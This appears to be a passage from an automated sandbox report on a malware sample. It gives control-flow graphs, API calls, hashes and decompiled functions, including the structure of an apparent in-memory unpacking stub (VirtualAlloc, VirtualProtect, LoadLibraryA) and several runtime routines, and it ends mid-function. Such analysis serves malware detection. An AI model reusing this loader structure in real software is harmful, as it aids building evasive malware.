                                                                                                                                                                                                          control_flow_graph 152 2cb003c-2cb0047 153 2cb0049 152->153 154 2cb004c-2cb0263 call 2cb0a3f call 2cb0e0f call 2cb0d90 VirtualAlloc 152->154 153->154 169 2cb028b-2cb0292 154->169 170 2cb0265-2cb0289 call 2cb0a69 154->170 172 2cb02a1-2cb02b0 169->172 173 2cb02ce-2cb03c2 VirtualProtect call 2cb0cce call 2cb0ce7 170->173 172->173 174 2cb02b2-2cb02cc 172->174 181 2cb03d1-2cb03e0 173->181 174->172 182 2cb0439-2cb04b8 VirtualFree 181->182 183 2cb03e2-2cb0437 call 2cb0ce7 181->183 185 2cb04be-2cb04cd 182->185 186 2cb05f4-2cb05fe 182->186 183->181 190 2cb04d3-2cb04dd 185->190 187 2cb077f-2cb0789 186->187 188 2cb0604-2cb060d 186->188 193 2cb078b-2cb07a3 187->193 194 2cb07a6-2cb07b0 187->194 188->187 191 2cb0613-2cb0637 188->191 190->186 195 2cb04e3-2cb0505 LoadLibraryA 190->195 200 2cb063e-2cb0648 191->200 193->194 196 2cb086e-2cb08be LoadLibraryA 194->196 197 2cb07b6-2cb07cb 194->197 198 2cb0517-2cb0520 195->198 199 2cb0507-2cb0515 195->199 208 2cb08c7-2cb08f9 196->208 201 2cb07d2-2cb07d5 197->201 202 2cb0526-2cb0547 198->202 199->202 200->187 203 2cb064e-2cb065a 200->203 204 2cb07d7-2cb07e0 201->204 205 2cb0824-2cb0833 201->205 206 2cb054d-2cb0550 202->206 203->187 207 2cb0660-2cb066a 203->207 209 2cb07e2 204->209 210 2cb07e4-2cb0822 204->210 214 2cb0839-2cb083c 205->214 211 2cb05e0-2cb05ef 206->211 212 2cb0556-2cb056b 206->212 213 2cb067a-2cb0689 207->213 215 2cb08fb-2cb0901 208->215 216 2cb0902-2cb091d 208->216 209->205 210->201 211->190 217 2cb056f-2cb057a 212->217 218 2cb056d 212->218 219 2cb068f-2cb06b2 213->219 220 2cb0750-2cb077a 213->220 214->196 221 2cb083e-2cb0847 214->221 215->216 223 2cb059b-2cb05bb 217->223 224 2cb057c-2cb0599 217->224 218->211 225 2cb06ef-2cb06fc 219->225 226 2cb06b4-2cb06ed 219->226 220->200 227 2cb084b-2cb086c 221->227 228 2cb0849 221->228 235 2cb05bd-2cb05db 223->235 224->235 229 2cb074b 225->229 230 2cb06fe-2cb0748 225->230 226->225 227->214 228->196 229->213 230->229 235->206
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02CB024D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                          • Instruction ID: cf7339fcc9830ce15fc99d41795d567bf203f76d7c6899e1791ff3b9f3428347
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9527974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 236 4018f0-4018fa 237 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 236->237 238 4018fc-401900 236->238 241 401940-401949 GetLastError 237->241 242 401996-40199a 237->242 243 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 241->243 244 40198d-40198f 241->244 243->244 244->242 246 401991 call 401030 244->246 246->242
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				int _t25;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = __edx;
                                                                                                                                                                                                          				_t35 = _a4;
                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                          					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                          					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                          					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                          					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                          						_t12 = GetLastError();
                                                                                                                                                                                                          						if(_t12 == 0x7a) {
                                                                                                                                                                                                          							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                          							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                          							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                          							asm("sbb esi, esi");
                                                                                                                                                                                                          							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t30 != 0) {
                                                                                                                                                                                                          							_t12 = E00401030();
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					 *__ecx = _t35;
                                                                                                                                                                                                          					return __eax;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x004018f0
                                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                                          0x004018f6
                                                                                                                                                                                                          0x004018fa
                                                                                                                                                                                                          0x00401917
                                                                                                                                                                                                          0x0040191a
                                                                                                                                                                                                          0x0040192f
                                                                                                                                                                                                          0x00401939
                                                                                                                                                                                                          0x0040193b
                                                                                                                                                                                                          0x0040193e
                                                                                                                                                                                                          0x00401940
                                                                                                                                                                                                          0x00401949
                                                                                                                                                                                                          0x0040195e
                                                                                                                                                                                                          0x0040196b
                                                                                                                                                                                                          0x00401980
                                                                                                                                                                                                          0x0040198a
                                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                                          0x0040198f
                                                                                                                                                                                                          0x00401991
                                                                                                                                                                                                          0x00401991
                                                                                                                                                                                                          0x0040198f
                                                                                                                                                                                                          0x0040199a
                                                                                                                                                                                                          0x004018fc
                                                                                                                                                                                                          0x004018fc
                                                                                                                                                                                                          0x00401900
                                                                                                                                                                                                          0x00401900

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 249 40af66-40af6e 250 40af7d-40af88 call 40b84d 249->250 253 40af70-40af7b call 40d2e3 250->253 254 40af8a-40af8b 250->254 253->250 257 40af8c-40af98 253->257 258 40afb3-40afca call 40af49 call 40cd39 257->258 259 40af9a-40afb2 call 40aefc call 40d2bd 257->259 259->258
                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                          			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v4;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t40 = __edi;
                                                                                                                                                                                                          				_t28 = __ebx;
                                                                                                                                                                                                          				_t45 = _t51;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                          					if(_t14 != 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                          					__eflags = _t15;
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                          						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                          							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                          							__eflags =  *0x423490;
                                                                                                                                                                                                          							E0040AEFC(0x423484);
                                                                                                                                                                                                          							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                          						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                          						_t47 = _t45;
                                                                                                                                                                                                          						_push(_t47);
                                                                                                                                                                                                          						_push(0xc);
                                                                                                                                                                                                          						_push(0x420ff8);
                                                                                                                                                                                                          						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                          						_t42 = _v4;
                                                                                                                                                                                                          						__eflags = _t42;
                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                          							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                          							if( *0x4250b0 != 3) {
                                                                                                                                                                                                          								_push(_t42);
                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								E0040D6E0(_t28, 4);
                                                                                                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          								_t24 = E0040D713(_t42);
                                                                                                                                                                                                          								_v40 = _t24;
                                                                                                                                                                                                          								__eflags = _t24;
                                                                                                                                                                                                          								if(_t24 != 0) {
                                                                                                                                                                                                          									_push(_t42);
                                                                                                                                                                                                          									_push(_t24);
                                                                                                                                                                                                          									E0040D743();
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v16 = 0xfffffffe;
                                                                                                                                                                                                          								_t19 = E0040B70B();
                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                          									_push(_v4);
                                                                                                                                                                                                          									L16:
                                                                                                                                                                                                          									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                          										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return E0040E21D(_t19);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          				goto L19;
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          0x0040af66
                                                                                                                                                                                                          0x0040af66
                                                                                                                                                                                                          0x0040af69
                                                                                                                                                                                                          0x0040af7d
                                                                                                                                                                                                          0x0040af80
                                                                                                                                                                                                          0x0040af88
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040af73
                                                                                                                                                                                                          0x0040af79
                                                                                                                                                                                                          0x0040af7b
                                                                                                                                                                                                          0x0040af8c
                                                                                                                                                                                                          0x0040af98
                                                                                                                                                                                                          0x0040af9a
                                                                                                                                                                                                          0x0040af9a
                                                                                                                                                                                                          0x0040afa3
                                                                                                                                                                                                          0x0040afad
                                                                                                                                                                                                          0x0040afb2
                                                                                                                                                                                                          0x0040afb7
                                                                                                                                                                                                          0x0040afc5
                                                                                                                                                                                                          0x0040afca
                                                                                                                                                                                                          0x0040afd0
                                                                                                                                                                                                          0x0040aec2
                                                                                                                                                                                                          0x0040b6b5
                                                                                                                                                                                                          0x0040b6b7
                                                                                                                                                                                                          0x0040b6bc
                                                                                                                                                                                                          0x0040b6c1
                                                                                                                                                                                                          0x0040b6c4
                                                                                                                                                                                                          0x0040b6c6
                                                                                                                                                                                                          0x0040b6c8
                                                                                                                                                                                                          0x0040b6cf
                                                                                                                                                                                                          0x0040b714
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040b6d1
                                                                                                                                                                                                          0x0040b6d3
                                                                                                                                                                                                          0x0040b6d9
                                                                                                                                                                                                          0x0040b6de
                                                                                                                                                                                                          0x0040b6e4
                                                                                                                                                                                                          0x0040b6e7
                                                                                                                                                                                                          0x0040b6e9
                                                                                                                                                                                                          0x0040b6eb
                                                                                                                                                                                                          0x0040b6ec
                                                                                                                                                                                                          0x0040b6ed
                                                                                                                                                                                                          0x0040b6f3
                                                                                                                                                                                                          0x0040b6f4
                                                                                                                                                                                                          0x0040b6fb
                                                                                                                                                                                                          0x0040b700
                                                                                                                                                                                                          0x0040b704
                                                                                                                                                                                                          0x0040b706
                                                                                                                                                                                                          0x0040b715
                                                                                                                                                                                                          0x0040b723
                                                                                                                                                                                                          0x0040b725
                                                                                                                                                                                                          0x0040b727
                                                                                                                                                                                                          0x0040b73a
                                                                                                                                                                                                          0x0040b73c
                                                                                                                                                                                                          0x0040b725
                                                                                                                                                                                                          0x0040b704
                                                                                                                                                                                                          0x0040b6cf
                                                                                                                                                                                                          0x0040b742
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040af7b
                                                                                                                                                                                                          0x0040af8b
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                                                          • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 363 3050481-30504d9 369 30504e5-30504e8 363->369 370 30504db-30504dd 363->370 371 30507f3-3050874 369->371 373 30504ee-30504f0 369->373 370->371 372 30504e3 370->372 372->373 375 30504fa-305053c 373->375 382 30505ae-3050618 375->382 383 305053e-3050570 375->383 402 3050631 382->402 403 305061a-305062f 382->403 392 3050572-3050574 383->392 393 305057c-305057f 383->393 392->371 395 305057a 392->395 393->371 394 3050585-30505a8 393->394 394->382 395->394 404 3050639 402->404 406 3050644-305065a 403->406 404->406 409 3050660-3050674 406->409 410 30506fd-3050719 406->410 413 3050676-305067e 409->413 414 30506ec-30506f0 409->414 418 3050790-30507c1 410->418 419 305071b-3050726 410->419 417 3050684-305068c 413->417 414->409 416 30506f6 414->416 416->410 417->410 420 305068e-305069f LdrInitializeThunk 417->420 433 30507eb-30507f2 418->433 424 3050750-3050774 419->424 425 3050728-305074e 419->425 423 30506a5-30506b4 420->423 431 30506e4-30506e8 423->431 432 30506b6-30506e2 423->432 438 305077b-3050788 424->438 425->424 431->420 434 30506ea 431->434 432->410 434->410 440 305078e 438->440 440->433
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: {o^
                                                                                                                                                                                                          • API String ID: 0-4057684116
                                                                                                                                                                                                          • Opcode ID: 186f0ea5e054cb02975c107b5d8aa21e6fa98898f6dee950d98986d4fbc98c5a
                                                                                                                                                                                                          • Instruction ID: 0301d7f2956a89a937331aa9e5fac8ad72392139314388098a8e07a86c28af9d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 186f0ea5e054cb02975c107b5d8aa21e6fa98898f6dee950d98986d4fbc98c5a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36A1F6397115008FC794DF29D598A2ABBE6FF89714B2584A9E906CB3B1DB31EC41CF90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 442 2cb0e0f-2cb0e24 SetErrorMode * 2 443 2cb0e2b-2cb0e2c 442->443 444 2cb0e26 442->444 444->443
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000400,?,?,02CB0223,?,?), ref: 02CB0E19
                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,02CB0223,?,?), ref: 02CB0E1E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                          • Instruction ID: fdadc0463ad45a6f1627bb6a21ce9283ece9353430d24b8cd761bb0491863ca9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D01236245228B7DB012A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 445 40e7ee-40e7f6 call 40e7c3 447 40e7fb-40e7ff ExitProcess 445->447
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040E7EE(int _a4) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E0040E7C3(_a4); // executed
                                                                                                                                                                                                          				ExitProcess(_a4);
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x0040e7f6
                                                                                                                                                                                                          0x0040e7ff

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2427264223-0
                                                                                                                                                                                                          • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                          • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 448 40d534-40d556 HeapCreate 449 40d558-40d559 448->449 450 40d55a-40d563 448->450
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                          				 *0x4234b4 = _t6;
                                                                                                                                                                                                          				if(_t6 != 0) {
                                                                                                                                                                                                          					 *0x4250b0 = 1;
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t6;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          0x0040d549
                                                                                                                                                                                                          0x0040d54f
                                                                                                                                                                                                          0x0040d556
                                                                                                                                                                                                          0x0040d55d
                                                                                                                                                                                                          0x0040d563
                                                                                                                                                                                                          0x0040d559
                                                                                                                                                                                                          0x0040d559
                                                                                                                                                                                                          0x0040d559

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 451 40ea0a-40ea16 call 40e8de 453 40ea1b-40ea1f 451->453
                                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                                          			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				void* _t2;
